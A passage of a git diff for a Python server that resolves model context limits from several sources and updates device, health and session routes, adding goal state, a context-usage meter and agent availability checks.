+    _models_dev_cache_time = now
+    return data
+
+
+async def _resolve_models_dev_limits(
+    provider_id: str,
+    model_id: str,
+) -> tuple[Optional[int], Optional[int]]:
+    """Resolve model limits from models.dev, returning empty values on failure."""
+    models_dev_provider = _models_dev_provider_id(provider_id, model_id)
+    if not models_dev_provider:
+        return None, None
+
+    data = await _fetch_models_dev()
+    if not data:
+        return None, None
+
+    provider_data = data.get(models_dev_provider)
+    if not isinstance(provider_data, dict):
+        return None, None
+    models = provider_data.get("models")
+    if not isinstance(models, dict):
+        return None, None
+
+    model_candidates = [model_id]
+    if ":" in model_id:
+        model_candidates.append(model_id.split(":", 1)[1])
+
+    entry = None
+    for model_candidate in model_candidates:
+        entry = models.get(model_candidate)
+        if isinstance(entry, dict):
+            break
+        model_lower = model_candidate.lower()
+        for candidate_id, candidate in models.items():
+            if candidate_id.lower() == model_lower and isinstance(candidate, dict):
+                entry = candidate
+                break
+        if isinstance(entry, dict):
+            break
+    if not isinstance(entry, dict):
+        return None, None
+
+    limits = entry.get("limit")
+    if not isinstance(limits, dict):
+        return None, None
+    return (
+        _coerce_positive_int(limits.get("context")),
+        _coerce_positive_int(limits.get("output")),
+    )
+
+
+async def _resolve_model_limits(
+    provider_id: str,
+    body: CreateModelReq,
+    raw_provider: dict[str, Any],
+) -> ResolvedModelLimits:
+    """Resolve model limits using explicit values, local metadata, models.dev, fallback."""
+    context_window = body.context_window
+    max_output_tokens = body.max_output_tokens
+    if context_window is not None and max_output_tokens is not None:
+        return ResolvedModelLimits(context_window, max_output_tokens, "explicit")
+
+    source = "explicit"
+    catalog_context, catalog_max_output = _resolve_catalog_limits(
+        provider_id,
+        body.model_id,
+        raw_provider,
+    )
+    before = (context_window, max_output_tokens)
+    context_window, max_output_tokens = _merge_missing_limits(
+        context_window,
+        max_output_tokens,
+        catalog_context,
+        catalog_max_output,
+    )
+    if before != (context_window, max_output_tokens):
+        source = "catalog"
+
+    if context_window is None or max_output_tokens is None:
+        models_dev_context, models_dev_max_output = await _resolve_models_dev_limits(
+            provider_id,
+            body.model_id,
+        )
+        before = (context_window, max_output_tokens)
+        context_window, max_output_tokens = _merge_missing_limits(
+            context_window,
+            max_output_tokens,
+            models_dev_context,
+            models_dev_max_output,
+        )
+        if before != (context_window, max_output_tokens):
+            source = "models_dev"
+
+    before = (context_window, max_output_tokens)
+    context_window, max_output_tokens = _merge_missing_limits(
+        context_window,
+        max_output_tokens,
+        FALLBACK_CONTEXT_WINDOW,
+        FALLBACK_MAX_OUTPUT_TOKENS,
+    )
+    if before != (context_window, max_output_tokens):
+        source = "fallback"
+
+    return ResolvedModelLimits(
+        context_window=context_window or FALLBACK_CONTEXT_WINDOW,
+        max_output_tokens=max_output_tokens or FALLBACK_MAX_OUTPUT_TOKENS,
+        source=source,
+    )
+
+
 def _register_provider(
     pid: str, name: str, base_url: str, api_key: Optional[str] = None
 ):
@@ -298,7 +604,13 @@ def _register_provider(
     Provider.register(p)
 
 
-def _add_model_to_runtime(provider_id: str, body: CreateModelReq):
+def _add_model_to_runtime(
+    provider_id: str,
+    body: CreateModelReq,
+    *,
+    context_window: Optional[int] = None,
+    max_output_tokens: Optional[int] = None,
+):
     """Add (or upsert) a model in the runtime Provider registry.
 
     Works for both CustomProvider (_custom_models) and DynamicOpenAIProvider
@@ -320,8 +632,16 @@ def _add_model_to_runtime(provider_id: str, body: CreateModelReq):
             supports_tools=body.supports_tools,
             supports_vision=body.supports_vision,
             supports_reasoning=body.supports_reasoning,
-            max_tokens=body.max_output_tokens,
-            context_window=body.context_window,
+            max_tokens=(
+                max_output_tokens
+                or body.max_output_tokens
+                or FALLBACK_MAX_OUTPUT_TOKENS
+            ),
+            context_window=(
+                context_window
+                or body.context_window
+                or FALLBACK_CONTEXT_WINDOW
+            ),
         ),
         pricing=_pricing,
     )
diff --git a/flocks/server/routes/device.py b/flocks/server/routes/device.py
index 3fbbae766..650a13b72 100644
--- a/flocks/server/routes/device.py
+++ b/flocks/server/routes/device.py
@@ -5,6 +5,7 @@
 """
 from __future__ import annotations
 
+import json
 from typing import Any, List, Optional
 
 import aiosqlite
@@ -40,10 +41,11 @@
     create_custom_device_template,
     list_device_templates,
 )
+from flocks.tool.device.secrets import resolve_for_runtime
 from flocks.tool.device.store import (
     create_group,
-    delete_device_tool_setting,
     delete_group,
+    delete_device_tool_setting,
     fetch_device,
     get_group,
     list_device_tool_settings,
@@ -174,7 +176,6 @@ async def route_delete_group(group_id: str):
 
 @router.get("", response_model=List[DeviceIntegration])
 async def route_list_devices(group_id: Optional[str] = None, refresh: bool = False):
-    await ensure_user_device_instances(refresh_templates=refresh)
     return await list_devices(group_id)
 
 
@@ -183,6 +184,13 @@ async def route_list_device_templates(refresh: bool = False):
     return list_device_templates(refresh=refresh)
 
 
+@router.post("/sync")
+async def route_sync_devices(refresh: bool = True):
+    """Synchronize device instances from installed user-level templates."""
+    created = await ensure_user_device_instances(refresh_templates=refresh)
+    return {"created": created}
+
+
 @router.post(
     "/templates/custom",
     response_model=DeviceTemplate,
@@ -317,7 +325,7 @@ async def route_list_device_tools(device_id: str):
     """列出设备对应插件的所有工具，并附带该设备的独立开关状态。
 
     返回的 ``enabled_effective`` 字段反映实际执行时的生效状态：
-    - 若存在 per-device 覆盖（enabled_device 非 null），以它为准；
+    - 若存在 per-device 禁用覆盖（enabled_device=false），以它为准；
     - 否则沿用全局 tool_settings（enabled_global）。
     """
     row = await fetch_device(device_id)
@@ -342,7 +350,8 @@ async def route_list_device_tools(device_id: str):
 
     result: List[DeviceToolInfo] = []
     for t in device_tools:
-        enabled_device: Optional[bool] = per_device.get(t.name)
+        raw_enabled_device: Optional[bool] = per_device.get(t.name)
+        enabled_device: Optional[bool] = False if raw_enabled_device is False else None
 
         enabled_global = t.enabled
         enabled_effective = (
@@ -366,10 +375,10 @@ async def route_list_device_tools(device_id: str):
 async def route_update_device_tool(
     device_id: str, tool_name: str, body: DeviceToolUpdateRequest
 ):
-    """设置或清除某工具在指定设备上的独立开关。
+    """设置某工具在指定设备上的独立开关。
 
     - ``enabled=false`` → 仅在该设备上禁用工具，不影响同版本其他设备；
-    - ``enabled=true``  → 移除 per-device 覆盖，恢复遵从全局工具开关。
+    - ``enabled=true``  → 清除该设备禁用覆盖并跟随全局；若全局禁用则先启用全局工具。
     """
     row = await fetch_device(device_id)
     if row is None:
@@ -389,7 +398,10 @@ async def route_update_device_tool(
         )
 
     if body.enabled:
-        # Removing the override restores global behaviour.
+        if not tool.info.enabled:
+            from flocks.server.routes.tool import _set_global_tool_enabled
+
+            _set_global_tool_enabled(tool, True)
         await delete_device_tool_setting(device_id, tool_name)
         enabled_device = None
     else:
diff --git a/flocks/server/routes/health.py b/flocks/server/routes/health.py
index ed7c8f64e..f2539d038 100644
--- a/flocks/server/routes/health.py
+++ b/flocks/server/routes/health.py
@@ -19,15 +19,6 @@ class HealthResponse(BaseModel):
     timestamp: str
     config_dir: str
     data_dir: str
-    task_manager_started: bool
-    task_scheduler_running: bool
-    task_scheduler_available: bool
-    task_manager_error: str | None = None
-    task_queue_paused: bool = False
-    task_queue_running: int = 0
-    task_queue_queued: int = 0
-    task_stale_running: int = 0
-    task_oldest_running_seconds: int | None = None
 
 
 @router.get(
@@ -45,9 +36,6 @@ async def health_check() -> HealthResponse:
     """
     from datetime import UTC
     config = Config.get_global()
-    from flocks.task.manager import TaskManager
-    task_status = TaskManager.runtime_status()
-    queue_status = await TaskManager.queue_status()
     
     from flocks.updater import get_current_version
     return HealthResponse(
@@ -56,12 +44,6 @@ async def health_check() -> HealthResponse:
         timestamp=datetime.now(UTC).isoformat(),
         config_dir=str(config.config_dir),
         data_dir=str(config.data_dir),
-        **task_status,
-        task_queue_paused=queue_status["paused"],
-        task_queue_running=queue_status["running"],
-        task_queue_queued=queue_status["queued"],
-        task_stale_running=queue_status["stale_running"],
-        task_oldest_running_seconds=queue_status["oldest_running_seconds"],
     )
 
 
diff --git a/flocks/server/routes/session.py b/flocks/server/routes/session.py
index a8684521d..68b15a082 100644
--- a/flocks/server/routes/session.py
+++ b/flocks/server/routes/session.py
@@ -18,6 +18,11 @@
 from flocks.server.routes._timing import log_route_timing
 from flocks.audit import emit_audit_event
 from flocks.license import assert_license_active
+from flocks.session.context_usage import (
+    ContextUsageSnapshot,
+    build_context_usage_snapshot,
+    token_usage_to_dict,
+)
 from flocks.session.session import Session, SessionInfo as SessionModel
 from flocks.session.policy import SessionPolicy
 from flocks.utils.log import Log
@@ -91,6 +96,15 @@ class SessionTime(BaseModel):
     archived: Optional[int] = Field(None, description="Archive timestamp (ms)")
 
 
+class SessionGoalResponse(BaseModel):
+    """Persisted goal state shown by the WebUI composer banner."""
+    model_config = ConfigDict(populate_by_name=True)
+
+    status: Literal["active", "paused", "completed", "blocked"] = Field(..., description="Goal status")
+    objective: str = Field(..., description="Goal objective")
+    reason: Optional[str] = Field(None, description="Last goal judge reason")
+
+
 class SessionResponse(BaseModel):
     """
     Session response - Flocks compatible
@@ -119,6 +133,7 @@ class SessionResponse(BaseModel):
     canWrite: bool = Field(False, description="Whether current user can continue this session")
     canDelete: bool = Field(False, description="Whether current user can delete this session")
     isShared: bool = Field(False, description="Whether this session is locally shared")
+    goal: Optional[SessionGoalResponse] = Field(None, description="Persisted session goal state")
 
 
 def _session_to_response(session: SessionModel) -> SessionResponse:
@@ -159,6 +174,26 @@ def _session_to_response(session: SessionModel) -> SessionResponse:
     )
 
 
+async def _session_to_response_with_goal(session: SessionModel) -> SessionResponse:
+    """Convert SessionModel to SessionResponse and attach persisted goal state."""
+    response = _session_to_response(session)
+    try:
+        from flocks.session.goal import GoalManager
+
+        goal_state = await GoalManager.get(session.id)
+    except Exception as exc:
+        log.warn("session.goal.response_error", {"sessionID": session.id, "error": str(exc)})
+        goal_state = None
+
+    if goal_state is not None:
+        response.goal = SessionGoalResponse(
+            status=goal_state.status,
+            objective=goal_state.objective,
+            reason=goal_state.last_reason or goal_state.paused_reason,
+        )
+    return response
+
+
 def _require_session_read_access(session: SessionModel, user) -> None:
     if not SessionPolicy.can_read(session, user):
         raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="仅会话所有者或受邀只读用户可访问会话")
@@ -169,6 +204,39 @@ def _require_session_write_access(session: SessionModel, user) -> None:
         raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="仅会话所有者可写，受邀用户为只读")
 
 
+async def _require_agent_usable_for_chat(agent_name: Optional[str]) -> None:
+    """Validate an explicitly requested chat agent.
+
+    The Agent page "enabled" toggle is stored as ``delegatable`` for backward
+    compatibility, but product semantics treat disabled subagents as unusable
+    from both delegation and direct chat selection.
+    """
+    if not agent_name:
+        return
+
+    from flocks.agent.registry import Agent
+
+    agent = await Agent.get(agent_name)
+    if agent is None:
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail=f'Agent "{agent_name}" is not available',
+        )
+
+    tags = getattr(agent, "tags", None) or []
+    if getattr(agent, "hidden", False) or "system" in tags:
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail=f'Agent "{agent_name}" is not available for chat',
+        )
+
+    if getattr(agent, "mode", None) != "primary" and getattr(agent, "delegatable", True) is False:
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail=f'Agent "{agent_name}" is disabled',
+        )
+
+
 def _is_hidden_from_session_manager(session: SessionModel) -> bool:
     """Return whether a session should be excluded from manager listings."""
     metadata = session.metadata if isinstance(session.metadata, dict) else {}
@@ -196,6 +264,37 @@ async def _get_session_by_id_unfiltered(session_id: str) -> Optional[SessionMode
         reset_current_auth_user(token)
 
 
+async def _publish_context_usage_update(
+    event_publish_callback,
+    session_id: str,
+    *,
+    session: Optional[SessionModel] = None,
+    provider_id: Optional[str] = None,
+    model_id: Optional[str] = None,
+) -> None:
+    """Best-effort SSE update for the composer context-usage meter."""
+    if event_publish_callback is None:
+        return
+    try:
+        if session is None:
+            session = await _get_session_by_id_unfiltered(session_id)
+        snapshot = await build_context_usage_snapshot(
+            session_id,
+            session=session,
+            provider_id=provider_id,
+            model_id=model_id,
+        )
+        await event_publish_callback(
+            "context.usage.updated",
+            snapshot.model_dump(by_alias=True),
+        )
+    except Exception as exc:
+        log.debug("session.context_usage.publish_failed", {
+            "sessionID": session_id,
+            "error": str(exc),
+        })
+
+
 # =============================================================================
 # Session CRUD Routes
 # =============================================================================
@@ -277,7 +376,7 @@ async def list_sessions(
         if limit is not None and len(filtered) >= limit:
             break
     
-    response = [_session_to_response(s) for s in filtered]
+    response = [await _session_to_response_with_goal(s) for s in filtered]
     log_route_timing(log, "session.list.complete", started_at=started_at, extra={
         "count": len(response),
         "roots": roots,
@@ -382,7 +481,7 @@ async def create_session(http_request: Request, request: Optional[SessionCreateR
         )
     except Exception:
         pass
-    return _session_to_response(session)
+    return await _session_to_response_with_goal(session)
 
 
 
@@ -404,7 +503,26 @@ async def get_session(sessionID: str, request: Request) -> SessionResponse:
             detail=f"Session {sessionID} not found"
         )
     _require_session_read_access(session, _current_user)
-    return _session_to_response(session)
+    return await _session_to_response_with_goal(session)
+
+
+@router.get(
+    "/{sessionID}/context-usage",
+    response_model=ContextUsageSnapshot,
+    summary="Get session context usage",
+    description="Get the current context usage snapshot for the composer meter",
+)
+async def get_session_context_usage(sessionID: str, request: Request) -> ContextUsageSnapshot:
+    """Return current prompt/context usage for a session."""
+    current_user = require_user(request)
+    session = await _get_session_by_id_unfiltered(sessionID)
+    if not session:
+        raise HTTPException(
+            status_code=status.HTTP_404_NOT_FOUND,
+            detail=f"Session {sessionID} not found",
+        )
+    _require_session_read_access(session, current_user)
+    return await build_context_usage_snapshot(sessionID, session=session)
 
 
 @router.get(
@@ -424,7 +542,7 @@ async def get_session_children(sessionID: str, request: Request) -> List[Session
         )
     _require_session_read_access(session, current_user)
     children = await Session.children(session.project_id, sessionID)
-    return [_session_to_response(s) for s in children if SessionPolicy.can_read(s, current_user)]
+    return [await _session_to_response_with_goal(s) for s in children if SessionPolicy.can_read(s, current_user)]
 
 
 class TodoInfo(BaseModel):
@@ -615,7 +733,7 @@ async def update_session(
         )
     
     log.info("session.updated", {"session_id": sessionID})
-    return _session_to_response(session)
+    return await _session_to_response_with_goal(session)
 
 
 @router.post(
@@ -648,7 +766,7 @@ async def share_session_local(sessionID: str, http_request: Request) -> SessionR
             status_code=status.HTTP_404_NOT_FOUND,
             detail=f"Session {sessionID} not found",
         )
-    return _session_to_response(session)
+    return await _session_to_response_with_goal(session)
 
 
 @router.post(
@@ -681,7 +799,7 @@ async def unshare_session_local(sessionID: str, http_request: Request) -> Sessio
             status_code=status.HTTP_404_NOT_FOUND,
             detail=f"Session {sessionID} not found",
         )
-    return _session_to_response(session)
+    return await _session_to_response_with_goal(session)
 
 
 # =============================================================================
@@ -831,7 +949,7 @@ async def fork_session(sessionID: str, http_request: Request, request: Optional[
     forked = await Session.fork(session.project_id, sessionID, message_id)
     
     log.info("session.forked", {"from": sessionID, "to": forked.id})
-    return _session_to_response(forked)
+    return await _session_to_response_with_goal(forked)
 
 
 @router.get(
@@ -969,7 +1087,7 @@ async def revert_session(sessionID: str, request: RevertRequest, http_request: R
     )
     
     log.info("session.reverted", {"session_id": sessionID, "message_id": request.messageID})
-    return _session_to_response(updated)
+    return await _session_to_response_with_goal(updated)
 
 
 @router.post(
@@ -994,7 +1112,7 @@ async def unrevert_session(sessionID: str, http_request: Request) -> SessionResp
     updated = await SessionRevert.unrevert(session_id=sessionID)
     
     log.info("session.unreverted", {"session_id": sessionID})
-    return _session_to_response(updated)
+    return await _session_to_response_with_goal(updated)
 
 
 # =============================================================================
@@ -1051,6 +1169,7 @@ class PromptRequest(BaseModel):
     model: Optional[ModelInfo] = Field(None, description="Model selection")
     messageID: Optional[str] = Field(None, description="Message ID")
     agent: Optional[str] = Field(None, description="Agent name")
+    display_text: Optional[str] = Field(None, alias="displayText", description="User-visible message text")
     noReply: Optional[bool] = Field(None, description="Skip AI response")
     mockReply: Optional[str] = Field(None, description="Inject a mock assistant message after noReply user message")
     tools: Optional[Dict[str, bool]] = Field(None, description="Tool settings (deprecated)")
@@ -1692,10 +1811,12 @@ async def _on_error(error: str):
     final_content = ""
     assistant_message_id = None
     created_ms = end_ms
+    final_tokens = {"input": 0, "output": 0, "reasoning": 0, "cache": {"read": 0, "write": 0}}
 
     if result.last_message:
         assistant_message_id = result.last_message.id
         final_content = await Message.get_text_content(result.last_message)
+        final_tokens = token_usage_to_dict(getattr(result.last_message, "tokens", None))
         finish = getattr(result.last_message, "finish", None)
         if finish:
             finish_reason = finish
@@ -1724,10 +1845,17 @@ async def _on_error(error: str):
             "agent": agent_name,
             "path": {"cwd": working_directory, "root": working_directory},
             "cost": 0,
-            "tokens": {"input": 0, "output": 0, "reasoning": 0, "cache": {"read": 0, "write": 0}},
+            "tokens": final_tokens,
             "finish": finish_reason,
         }
     })
+    await _publish_context_usage_update(
+        publish_event,
+        session_id,
+        session=session,
+        provider_id=provider_id,
+        model_id=model_id,
+    )
 
     log.info("session.message.replay.completed", {
         "sessionID": session_id,
@@ -2191,27 +2319,42 @@ async def progress_callback(stage: str, data: dict) -> None:
                 "data": data,
             })
 
-    result = await run_compaction(
-        session_id,
-        parent_message_id=parent_message_id,
-        messages=messages,
-        provider_id=provider_id,
-        model_id=model_id,
-        auto=auto,
-        event_publish_callback=event_publish_callback,
-        status_after="idle",
-        focus_instruction=focus_instruction,
-        progress_callback=progress_callback,
-    )
+    async def publish_current_context_usage() -> None:
+        await _publish_context_usage_update(
+            event_publish_callback,
+            session_id,
+            session=session,
+            provider_id=provider_id,
+            model_id=model_id,
+        )
+
+    try:
+        result = await run_compaction(
+            session_id,
+            parent_message_id=parent_message_id,
+            messages=messages,
+            provider_id=provider_id,
+            model_id=model_id,
+            auto=auto,
+            event_publish_callback=event_publish_callback,
+            status_after="idle",
+            focus_instruction=focus_instruction,
+            progress_callback=progress_callback,
+        )
+    except Exception:
+        await publish_current_context_usage()
+        raise
     if result == "stop":
         # ``SessionCompaction.process`` swallows the underlying provider
         # exception (so the loop path stays simple) but stashes the
         # user-facing message via ``_record_compaction_error``.  Surface
         # it verbatim here so the SSE ``session.error`` payload — and
-        # therefore the front-end toast — shows e.g. "Error code: 529
-        # — 模型服务暂时不可用" instead of an opaque "Compaction failed".
+        # therefore the front-end toast — shows the provider's original
+        # error text instead of an opaque "Compaction failed".
+        await publish_current_context_usage()
         detail = pop_last_compaction_error(session_id) or "Compaction failed"
         raise RuntimeError(detail)
+    await publish_current_context_usage()
     return agent_name, provider_id, model_id
 
 
@@ -2222,16 +2365,16 @@ async def progress_callback(stage: str, data: dict) -> None:
 
 def _check_session_aborted(sessionID: str, checkpoint: str, step: int, **extra_context) -> bool:
     """
-    检查 session 是否被 abort
+    Check whether the session has been aborted.
     
     Args:
         sessionID: Session ID
-        checkpoint: 检查点名称（如 "before_step", "in_stream", "skip_tool_processing"）
-        step: 当前 step 数
-        **extra_context: 额外的日志上下文信息
+        checkpoint: Checkpoint name, such as "before_step", "in_stream", or "skip_tool_processing".
+        step: Current step number.
+        **extra_context: Additional log context.
     
     Returns:
-        True 表示 session 已被 abort，应该停止执行
+        True when the session has been aborted and execution should stop.
     """
     from flocks.session.core.status import SessionStatus
     
@@ -2302,6 +2445,7 @@ async def _process_session_message(
     # ------------------------------------------------------------------
     # 2. Resolve agent and model (5-level priority)
     # ------------------------------------------------------------------
+    await _require_agent_usable_for_chat(request.agent)
     agent_name = request.agent or await Agent.default_agent()
     agent = await Agent.get(agent_name) or await Agent.get(DEFAULT_AGENT)
     
@@ -2350,22 +2494,23 @@ async def _process_session_message(
     user_message_id = request.messageID or Identifier.create("message")
     user_part_id = Identifier.create("part")
 
-    # display_text (optional) is the user-visible text shown in the chat bubble.
-    # It differs from text_content when a command generates a derived LLM prompt
-    # (e.g. "/tools create foo" stores the slash command text, not the full skill
-    # prompt that is sent to the LLM).
-    display_text = getattr(request, "display_text", None) or text_content
+    # display_text (optional) is UI-only. The stored text part must stay as the
+    # real prompt so SessionLoop, hooks, title generation, and queued prompts keep
+    # seeing the same content the model receives.
+    display_text = getattr(request, "display_text", None)
+    display_metadata = {"displayText": display_text} if display_text else None
 
     _is_no_reply = bool(request.noReply)
     user_message = await Message.create(
         session_id=sessionID,
         role=MessageRole.USER,
-        content=display_text,
+        content=text_content,
         id=user_message_id,
         time={"created": now_ms},
         agent=agent_name,
         model={"providerID": provider_id, "modelID": model_id},
         part_id=user_part_id,
+        part_metadata=display_metadata,
         synthetic=True if _is_no_reply else None,
     )
     user_message_id = user_message.id
@@ -2385,9 +2530,11 @@ async def _process_session_message(
         "messageID": user_message_id,
         "sessionID": sessionID,
         "type": "text",
-        "text": display_text,
+        "text": text_content,
         "time": {"start": now_ms},
     }
+    if display_metadata:
+        _part_event["metadata"] = display_metadata
     if _is_no_reply:
         _part_event["synthetic"] = True
     await publish_event("message.part.updated", {"part": _part_event})
@@ -2443,7 +2590,7 @@ def _materialize_data_url_to_disk(
             unique_name = f"{Identifier.create('part')}{ext}"
             target = uploads_root / unique_name
             target.write_bytes(raw_bytes)
-            return f"file://{target.resolve()}"
+            return target.resolve().as_uri()
         except Exception as exc:
             log.warn("session.message.file_part.materialize_failed", {
                 "sessionID": sessionID,
@@ -2533,6 +2680,14 @@ def _materialize_data_url_to_disk(
                 },
             })
 
+        await _publish_context_usage_update(
+            publish_event,
+            sessionID,
+            session=session,
+            provider_id=provider_id,
+            model_id=model_id,
+        )
+
         return {
             "id": user_message_id,
             "sessionID": sessionID,
@@ -2589,10 +2744,12 @@ async def _on_error(error: str):
     finish_reason = "stop"
     final_content = ""
     assistant_message_id = None
+    final_tokens = {"input": 0, "output": 0, "reasoning": 0, "cache": {"read": 0, "write": 0}}
     
     if result.last_message:
         assistant_message_id = result.last_message.id
         final_content = await Message.get_text_content(result.last_message)
+        final_tokens = token_usage_to_dict(getattr(result.last_message, "tokens", None))
         finish = getattr(result.last_message, 'finish', None)
         if finish:
             finish_reason = finish
@@ -2619,10 +2776,17 @@ async def _on_error(error: str):
             "agent": agent_name,
             "path": {"cwd": working_directory, "root": working_directory},
             "cost": 0,
-            "tokens": {"input": 0, "output": 0, "reasoning": 0, "cache": {"read": 0, "write": 0}},
+            "tokens": final_tokens,
             "finish": finish_reason,
         }
     })
+    await _publish_context_usage_update(
+        publish_event,
+        sessionID,
+        session=session,
+        provider_id=provider_id,
+        model_id=model_id,
+    )
     
     # Collect parts for the response
     all_parts = []
@@ -2803,13 +2967,21 @@ def _extract_text_from_parts(parts: List[Dict[str, Any]]) -> str:
     return "".join(part.get("text", "") for part in parts if part.get("type") == "text")
 
 
-def _replace_text_parts(parts: Optional[List[Dict[str, Any]]], text: str) -> List[Dict[str, Any]]:
+def _replace_text_parts(
+    parts: Optional[List[Dict[str, Any]]],
+    text: str,
+    text_metadata: Optional[Dict[str, Any]] = None,
+) -> List[Dict[str, Any]]:
     updated_parts: List[Dict[str, Any]] = []
     replaced = False
     for part in parts or []:
         if part.get("type") == "text" and not replaced:
             next_part = dict(part)
             next_part["text"] = text
+            if text_metadata:
+                merged_metadata = dict(next_part.get("metadata") or {})
+                merged_metadata.update(text_metadata)
+                next_part["metadata"] = merged_metadata
             updated_parts.append(next_part)
             replaced = True
             continue
@@ -2818,7 +2990,10 @@ def _replace_text_parts(parts: Optional[List[Dict[str, Any]]], text: str) -> Lis
         updated_parts.append(dict(part))
 
     if not replaced:
-        updated_parts.insert(0, {"type": "text", "text": text})
+        next_part: Dict[str, Any] = {"type": "text", "text": text}
+        if text_metadata:
+            next_part["metadata"] = dict(text_metadata)
+        updated_parts.insert(0, next_part)
     return updated_parts
 
 
@@ -2926,7 +3101,7 @@ def _materialize_data_url_part(
                 ext = "." + tail.lower()
         target = uploads_root / f"{Identifier.create('part')}{ext}"
         target.write_bytes(raw_bytes)
-        return f"file://{target.resolve()}"
+        return target.resolve().as_uri()
     except Exception as exc:
         log.warn("session.prompt_queue.materialize_failed", {
             "sessionID": session_id,
@@ -2946,7 +3121,7 @@ def _event_from_queued_prompt(item, working_directory: str):
         agent=item.agent,
         model=item.model,
         variant=item.variant,
-        display_text=None,
+        display_text=item.display_text,
         messageID=item.messageID,
         noReply=item.noReply,
         mockReply=item.mockReply,
@@ -3059,7 +3234,7 @@ def _build_prompt_request_from_event(event, prompt_text: str, display_text: Opti
     import types
 
     return types.SimpleNamespace(
-        parts=_replace_text_parts(event.parts, prompt_text),
+        parts=_replace_text_parts(event.parts, prompt_text, event.metadata or None),
         display_text=display_text,
         agent=event.agent,
         model=_coerce_model_for_prompt_request(event.model),
@@ -3174,6 +3349,13 @@ async def _publish_direct_response(output_event, text: str) -> None:
                 "time": {"start": asst_now, "end": asst_now},
             }
         })
+        await _publish_context_usage_update(
+            publish_event,
+            sessionID,
+            session=session,
+            provider_id="builtin",
+            model_id="command",
+        )
 
     async def _run_llm(output_event, prompt_text: str, display_text: Optional[str] = None) -> None:
         request = _build_prompt_request_from_event(output_event, prompt_text, display_text)
@@ -3219,7 +3401,18 @@ async def _run_session_control(output_event, parsed) -> bool:
         session_control=_run_session_control,
         clear_history=_clear_history,
     )
-    await dispatch_user_input(event, sink)
+    result = await dispatch_user_input(event, sink)
+    if result.command_name == "goal" and result.action == "llm":
+        from flocks.session.goal import GoalManager
+
+        state = await GoalManager.get(sessionID)
+        if state is not None:
+            await publish_event("session.goal.updated", {
+                "sessionID": sessionID,
+                "status": state.status,
+                "objective": state.objective,
+                "reason": state.last_reason,
+            })
 
 
 class PromptQueueUpdateRequest(BaseModel):
@@ -3232,6 +3425,7 @@ async def _enqueue_prompt_request(
 ):
     from flocks.session.interaction_queue import InteractionQueue
 
+    await _require_agent_usable_for_chat(request.agent)
     model = request.model.model_dump(by_alias=True) if request.model else None
     parts = _materialize_queued_parts(session_id, [dict(part) for part in request.parts])
     return await InteractionQueue.enqueue(
@@ -3240,6 +3434,7 @@ async def _enqueue_prompt_request(
         agent=request.agent,
         model=model,
         variant=request.variant,
+        display_text=request.display_text,
         message_id=request.messageID,
         no_reply=request.noReply,
         mock_reply=request.mockReply,
@@ -3281,6 +3476,7 @@ async def enqueue_prompt(sessionID: str, request: PromptRequest) -> Dict[str, An
             status_code=status.HTTP_404_NOT_FOUND,
             detail=f"Session {sessionID} not found",
         )
+    await _require_agent_usable_for_chat(request.agent)
     try:
         item = await _enqueue_prompt_request(sessionID, request)
     except QueueFullError as exc:
@@ -3392,6 +3588,7 @@ async def send_session_message_async(
         _require_session_write_access(session, current_user)
     
     working_directory = session.directory or os.getcwd()
+    await _require_agent_usable_for_chat(request.agent)
     
     log.info("session.prompt_async.accepted", {
         "sessionID": sessionID,
@@ -3406,7 +3603,7 @@ async def send_session_message_async(
         agent=request.agent,
         model=request.model.model_dump(by_alias=True) if request.model else None,
         variant=request.variant,
-        display_text=None,
+        display_text=request.display_text,
         messageID=request.messageID,
         noReply=request.noReply,
         mockReply=request.mockReply,
@@ -3441,6 +3638,7 @@ class CommandRequest(BaseModel):
     
     command: str = Field(..., description="Command name")
     arguments: str = Field("", description="Command arguments")
+    arguments_json: Optional[Any] = Field(None, alias="argumentsJson", description="Structured command arguments")
     messageID: Optional[str] = Field(None, description="Message ID")
     agent: Optional[str] = Field(None, description="Agent name")
     model: Optional[str] = Field(None, description="Model string (provider/model)")
@@ -3487,11 +3685,18 @@ async def send_session_command(sessionID: str, request: CommandRequest, http_req
         _require_session_write_access(session, current_user)
 
     working_directory = session.directory or os.getcwd()
+    await _require_agent_usable_for_chat(request.agent)
+    raw_arguments = request.arguments
+    if not raw_arguments and request.arguments_json is not None:
+        raw_arguments = json.dumps(request.arguments_json, ensure_ascii=False)
+    command_metadata: Dict[str, Any] = {}
+    if request.arguments_json is not None:
+        command_metadata["commandArgumentsJson"] = request.arguments_json
 
     # The text the user typed, shown verbatim in the chat bubble
     slash_text = f"/{request.command}"
-    if request.arguments:
-        slash_text += f" {request.arguments}"
+    if raw_arguments:
+        slash_text += f" {raw_arguments}"
 
     # ── Background task ──────────────────────────────────────────────────────
     async def _handle_command() -> None:
@@ -3503,6 +3708,7 @@ async def _handle_command() -> None:
             agent=request.agent,
             model=request.model,
             variant=request.variant,
+            metadata=command_metadata,
             display_text=slash_text,
             messageID=request.messageID,
             working_directory=working_directory,
@@ -3740,11 +3946,16 @@ async def get_session_statistics(sessionID: str):
     - Model usage
     """
     try:
-        # Get session
-        session = await Session.load(sessionID)
-        
-        # Get messages
-        messages = await session.get_messages()
+        session = await _get_session_by_id_unfiltered(sessionID)
+        if not session:
+            raise HTTPException(
+                status_code=status.HTTP_404_NOT_FOUND,
+                detail=f"Session {sessionID} not found",
+            )
+
+        from flocks.session.message import Message
+
+        messages = await Message.list_with_parts(sessionID, include_archived=True)
         
         # Calculate statistics
         message_count = len(messages)
@@ -3752,26 +3963,27 @@ async def get_session_statistics(sessionID: str):
         tool_call_count = 0
         model_usage = {}
         
-        for msg in messages:
+        for message_with_parts in messages:
+            msg = message_with_parts.info
+
             # Count tokens (approximate from parts)
-            for part in msg.parts:
-                if hasattr(part, 'text') and part.text:
+            for part in message_with_parts.parts:
+                if hasattr(part, "text") and part.text:
                     token_count += len(part.text.split())  # Rough approximation
                 
                 # Count tool calls
-                if hasattr(part, 'toolCall') and part.toolCall:
+                if getattr(part, "type", None) == "tool":
                     tool_call_count += 1
             
             # Track model usage
-            if msg.model:
-                model_usage[msg.model] = model_usage.get(msg.model, 0) + 1
-        
-        # Get session info
-        info = await session.get_info()
+            model = getattr(msg, "model", None)
+            if model:
+                model_key = model if isinstance(model, str) else json.dumps(model, sort_keys=True, default=str)
